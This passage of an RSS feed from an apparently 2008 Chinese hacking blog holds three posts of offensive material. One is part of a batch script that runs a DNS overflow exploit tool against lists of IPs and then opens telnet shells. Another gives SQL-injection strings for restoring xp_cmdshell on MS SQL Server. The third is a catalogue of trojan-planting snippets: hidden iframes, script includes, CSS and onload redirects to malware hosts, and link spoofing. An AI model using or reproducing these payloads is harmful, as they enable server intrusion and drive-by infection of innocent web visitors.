1029 2003 <br>@echo================================================================================= <br>@ FOR /F &quot;eol= tokens=1 delims= &quot; %%i in (s.txt) do %MYFILES%\dns -s %%i &gt;&gt;a.txt <br>@echo================================================================================= <br>@echo 请把能<a href="http://www.77169.com/Images/ucxogu/yichu/77169.htm" target="_blank">溢出</a><wbr />的保存为boot.txt 保存格式：IP 端口 系统 例如 58.34.125.200 1029 2003 <br>@echo================================================================================= <br>@pause <br><br>@ for /F &quot;eol= tokens=1,2 delims= &quot; %%i in (boot.txt) do %MYFILES%\dns -t2000all %%i %%j <br><br>@for /F &quot;eol= tokens=1,2 delims= &quot; %%i in (boot.txt) do %MYFILES%\dns -t2003eng %%i %%j <br>@goto yichu <br>:yichu <br>@for /F &quot;eol=s tokens=1 delims= &quot; %%i in (boot.txt) do echo telnet %%i 1100&gt;&gt;3.txt <br>@for /F &quot;eol= tokens=1 http://www.77169.com/Images/ucxogu/yichu/77169.htm&quot; target=_blank&gt;溢出………… <br>@echo================================================================================= <br>@pause <!--v:3.2--> ]]></description>
<category><![CDATA[溢出攻击]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1215328777#comment</comments>
<qz:effect>512</qz:effect>
<pubDate>Sun, 06 Jul 2008 07:19:37 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1215328777</guid>
</item>

<item>
<title><![CDATA[xp_cmdshell的删除及恢复]]></title>
<link>http://214567620.qzone.qq.com/blog/1215328691</link>
<description><![CDATA[一、xp_cmdshell的删除及恢复<br>1、判断xp_cmdshell是否存在<br>and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')<br>select count(*) from master.dbo.sysobjects where xtype='x' and <br>返回结果为1就ok<br>2、恢复xp_cmdshell的方法<br>删除扩展存储过过程xp_cmdshell的语句<br>exec sp_dropextendedproc 'xp_cmdshell'<br>恢复cmdshell的sql语句<br>exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'<br>exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and <br>返回结果为1就ok<br>否则需上传c:\inetput\web\xplog70.dll后<br>exec master.dbo.sp_addextendedproc 'xp_cmdshell',’c:\inetput\web\xplog70.dll’;--<br>如果是用以下方法删除<br>drop procedure sp_addextendedproc<br>drop procedure sp_oacreate<br>exec sp_dropextendedproc 'xp_cmdshell'<br>则可以用以下语句恢复<br>dbcc addextendedproc (&quot;sp_oacreate&quot;,&quot;odsole70.dll&quot;)<br>dbcc addextendedproc (&quot;xp_cmdshell&quot;,&quot;xplog70.dll&quot;)<br>这样可以直接恢复，不用去管sp_addextendedproc是不是存在<br> <!--v:3.2--> ]]></description>
<category><![CDATA[入侵挂马]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1215328691#comment</comments>
<qz:effect>512</qz:effect>
<pubDate>Sun, 06 Jul 2008 07:18:11 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1215328691</guid>
</item>

<item>
<title><![CDATA[常用挂马代码]]></title>
<link>http://214567620.qzone.qq.com/blog/1215328639</link>
<description><![CDATA[一:框架挂马<br>     &lt;iframe src=http://plxzwn.512j.com/index.htm width=0 height=0&gt;&lt;/iframe&gt; <br>二:js文件挂马  <br>     首先将以下代码<br>     document.write(&quot;&lt;iframe width='0' height='0' src='地址'&gt;&lt;/iframe&gt;&quot;);<br>     保存为xxx.js，<br>     则JS挂马代码为<br>     &lt;script language=javascript src=xxx.js&gt;&lt;/script&gt; <br>三:js变形加密  <br>     &lt;SCRIPT language=&quot;JScript.Encode&quot;            src=http://www.xxx.com/muma.txt&gt;&lt;/script&gt; <br>     muma.txt可改成任意后缀<br>四:body挂马<br>     &lt;body onload=&quot;window.location='地址';&quot;&gt;&lt;/body&gt;<br>五:隐蔽挂马<br>     top.document.body.innerHTML = top.document.body.innerHTML +      '\r\n&lt;iframe src=&quot;'&gt;http://www.xxx.com/muma.htm/&quot;&gt;&lt;/iframe&gt;';<br>六:css中挂马<br>     body { <br>     background-image: url('javascript:document.write(&quot;&lt;script            src=http://www.XXX.net/muma.js&gt;&lt;/script&gt;&quot;)')} <br>七:JAJA挂马<br>    &lt;SCRIPT language=javascript&gt;      <br>    window.open    (&quot;地址&quot;,&quot;&quot;,&quot;toolbar=no,location=no,directories=no,status=no,menubar=no,scro    llbars=no,width=1,height=1&quot;);  <br>    &lt;/script&gt;<br>八:图片伪装<br>    &lt;html&gt;<br>    &lt;iframe src=&quot;网马地址&quot; height=0 width=0&gt;&lt;/iframe&gt;<br>    &lt;img src=&quot;图片地址&quot;&gt;&lt;/center&gt;<br>    &lt;/html&gt;<br>九:伪装调用：<br>     &lt;frameset rows=&quot;444,0&quot; cols=&quot;*&quot;&gt;<br>     &lt;frame src=&quot;打开网页&quot; framborder=&quot;no&quot; scrolling=&quot;auto&quot; noresize      marginwidth=&quot;0&quot;margingheight=&quot;0&quot;&gt;<br>     &lt;frame src=&quot;网马地址&quot; frameborder=&quot;no&quot; scrolling=&quot;no&quot;     noresize      marginwidth=&quot;0&quot;margingheight=&quot;0&quot;&gt;<br>     &lt;/frameset&gt;<br>十:高级欺骗<br>     &lt;a href=&quot;<a href="http://www.163.com/" target="_blank">http://www.163.com</a><wbr />(迷惑连接地址，显示这个地址指向木马地址)&quot; onMouseOver=&quot;www_163_com(); return true;&quot;&gt; 页面要显示的内容 &lt;/a&gt;<br>&lt;SCRIPT Language=&quot;JavaScript&quot;&gt;<br>function www_163_com ()<br>{<br>var url=&quot;网马地址&quot;;<br>open(url,&quot;NewWindow&quot;,&quot;toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10&quot;);<br>}<br>&lt;/SCRIPT&gt; <!--v:3.2--> ]]></description>
<category><![CDATA[入侵挂马]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1215328639#comment</comments>
<qz:effect>512</qz:effect>
<pubDate>Sun, 06 Jul 2008 07:17:19 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1215328639</guid>
</item>

</channel>
</rss>

